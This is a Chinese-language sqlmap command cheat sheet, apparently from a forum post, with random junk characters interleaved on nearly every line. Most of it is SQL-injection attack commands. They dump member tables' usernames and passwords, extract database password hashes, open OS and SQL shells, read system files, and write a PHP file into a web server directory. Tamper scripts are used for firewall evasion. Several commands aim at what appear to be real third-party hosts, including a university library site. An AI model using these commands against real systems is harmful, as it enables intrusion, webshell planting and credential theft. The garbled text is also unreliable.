/pentest/database/sqlmap
# q% |7 J; E2 h+ J6 {9 Y5 G2 ^ `$ D @
update :::::> in the folder after execute following order : svn update( C! c2 J5 b" I/ R D! {7 @, O
2 q, @( G9 H; U7 a4 \
sqlmap.py -r 1.txt --current-db
$ I0 ~0 W1 G5 F0 C# ]$ K5 [; s0 I2 `' N0 X. Z6 y
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”6 D+ ~& U. q3 S! V: R4 w" K. d
8 r' j: j% j; v+ _1 B" p3 [; ~& U. t. ^==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
7 [4 H1 ~0 ~+ H1 v& o9 V) f* q猜解数据库
, G: |+ b, z( L% z' s c m./sqlmap.py -u "injection-url" --dbs
- ~- h R9 r8 f& O" r. msqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"8 r8 Y. n X8 {
K" k+ G! o# l* `猜解表名) }7 p8 ~! z6 _- I: {" W8 Y
./sqlmap.py -u "injection-url" -D database_name --tables
0 p5 s( }/ E: n4 `8 ~! x0 a; F- [/ {7 h
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
5 Y* A& H* W' i! j* Ksqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
u" |# q2 U! w" i, ~' M% R1 x0 v/ b2 c4 U
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump/ C/ w3 F* v9 d
% M% b: x2 T# D- @" B! msqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"; R/ [( E X$ X& `1 B# w! D
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
4 R9 G! ~+ a! u z8 D$ w7 W" P# psqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py" % G U( _4 e0 S
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
% c: T7 ~- O8 Q, d Q; t7 G5 m
4 Q- _( a6 q2 R* S& ?2 G x# hsqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
6 z7 [& W/ w: t/ P; t ~sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"' H% E7 c. h( C# W( [$ j
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
0 r, {. z" X6 H, @2 r+ P9 G; Osqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"- D( O/ {, P g4 z2 ^
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
L8 A M' H* _. t+ ~9 B2 e7 [" Y% Y2 @1 m5 y2 ^2 e6 b
sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了: {5 ^; S2 [1 A
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"( f9 ]8 z. E+ B0 x# {5 b, d; A
+ U3 A. k, ]" f5 L
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
6 C# a, j/ V+ h b猜解列名
$ G& Z7 |$ L6 i./sqlmap.py -u "injection-url" -D database_name -T table_name --columns/ H' { _) [) F' @; t3 C
$ _: r/ T' S& i2 d) q& y$ ^: o
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py" & w& O3 @! ]. N9 \" ^0 s# P% F( N
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
\3 b: ~$ ]# L3 M! ssqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"/ l0 ?, V1 N( l1 H; C( S! |3 ^. E
9 ~( x( K' |9 D, Y) |sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
+ Y# h0 l/ l: h! S; y&submit=Go
6 C- U0 ?8 m) ` U) f: C4 A猜解值( D' U7 w5 R% G P3 b! t
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
" [# C8 D5 ?% x+ W8 ~3 V========================================================
% f1 Z! u1 R4 y7 h" }2 Z) H& B( t- F" `搜索表名中包括mana字符的$ s6 Y4 ^: I: }; j! {
/sqlmap.py -u "injection-url" -T mana --search
/ W5 X2 p' i. l+ o' K7 ?返回一个交互式sql shell1 e; `- M3 A. [" ?; O
/sqlmap.py -u "injection-url" --sql-shell
8 X) Y' z" |' F' b3 V7 P' \读取指定文件(需权限)0 G# D% O, X& n0 \# m/ A# @$ J
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"" O" T4 h" ?+ \1 X" g; b! }
查看当前 用户 及 数据库
9 v) q7 N0 r* y. X: w5 w6 c% P/sqlmap.py -u "injection-url" --current-user --current-db
& I- o' X1 N3 o, C. G# z `! q) V! r9 ?本地文件 写入 远程目标绝对路径
3 g( L% N7 U+ x! @/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
/ ]$ H* u# Z. Fsqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
) p3 _6 J4 K% @# t r
2 }! s" O+ c3 i E: g: z! |/ csqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
6 b9 \5 V9 ?3 Y+ t y: q( B9 f6 _查看某用的权限
7 r3 `5 c$ n& P0 p' Y/sqlmap.py -u "injection-url" --privileges -U root
6 o8 U. b; ]% J+ d# T% ? _, g$ t- m. S查看当前用户是否为dba
- e: X/ T- n3 O: J/sqlmap.py -u "injection-url" --is-dba
, C1 |. W* G" Z+ ]( S: a* t读取所有数据库用户或指定数据库用户的密码 s( V3 W9 Z. c$ J6 `$ J" H# @
sqlmap.py -r 1.txt --users --passwords6 d. @7 [- {$ K& [
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
, r# u8 G/ ^# w l8 D* a' A7 v+ j8 d1 K& d e. E) _: b# u9 B
/sqlmap.py -u "injection-url" --passwords -U root
- D& T" j( n, {* S! n
; J2 I. ^5 \. w/ ~% P--start&&--stop 与 --first&&--last 的区别7 @1 _. |3 X7 F! \
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
6 u# Z0 W/ _6 m+ r. a( [) K- w4 A* P0 U) ~6 r+ O
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)$ T) i1 d- d6 P/ f I) k l
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
% K; d8 S) N R/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns V* H. r( O3 h. Y0 [4 }
8 G# R L9 R' q2 r
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)' _. _$ q8 d# |, `+ N, N- Z# \
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
1 a/ P5 b8 n% t1 `
5 }3 V+ B, ]/ F; t |